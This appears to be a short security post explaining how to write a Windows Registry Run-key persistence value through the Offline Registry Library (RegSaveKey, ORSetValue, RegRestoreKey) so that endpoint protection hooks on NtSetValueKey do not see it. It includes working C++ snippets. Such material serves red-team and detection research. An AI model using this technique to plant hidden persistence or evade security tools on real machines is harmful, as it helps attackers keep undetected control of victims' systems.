Most #EPP (Endpoint Protection Platforms) products offer dynamic monitoring capabilities such as sandboxing, emulation, and hooking. They track when applications call library functions (e.g., CreateFile from Kernel32) or use syscalls (e.g., mov rax, xxx; syscall). Based on their detection logic, a sample may be either detected or allowed to continue execution.
If your sample uses RegSetValue/RegSetValueEx or lower-level NtSetValueKey functions, it is highly likely that the targeted #EPP product monitors these calls, as they are commonly used to achieve persistence via the Registry.
However, there is a method to achieve the same goal without using NtSetValueKey. Windows provides the Offline Registry Library, which allows modification of a registry hive outside of the active system registry.
You can use RegSaveKey/RegSaveKeyEx or NtSaveKey/NtSaveKeyEx to save a specified key to a registry file and then use ORSetValue to set a desired value in the offline registry key:
auto status = RegOpenKeyEx(HKEY_CURRENT_USER, LR"(Software\Microsoft\Windows\CurrentVersion\Run)", 0, KEY_ALL_ACCESS, &key);status = RegSaveKey(key, file_name, nullptr);
ORHKEY offline_hive, target_offline_key;auto offline_status = OROpenHive(file_name, &offline_hive);offline_status = ORSetValue(offline_hive, L"my_value_name", REG_SZ, (PBYTE)target_path, target_path_bytes);offline_status = ORSaveHive(offline_hive, new_file_name, 6, 1);ORCloseHive(offline_hive);After modifying the offline registry file, you can call the RegRestoreKey function to replace a target key with the modified one from the file:
status = RegOpenKeyEx(HKEY_CURRENT_USER, LR"(Software\Microsoft\Windows\CurrentVersion\Run)", 0, KEY_ALL_ACCESS, &key);status = RegRestoreKey(key, new_file_name, REG_FORCE_RESTORE);In conclusion, the result is the same: the desired value is set without using the NtSetValueKey function, and it is less likely that #EPP products monitor the functions of the Offline Registry Library.
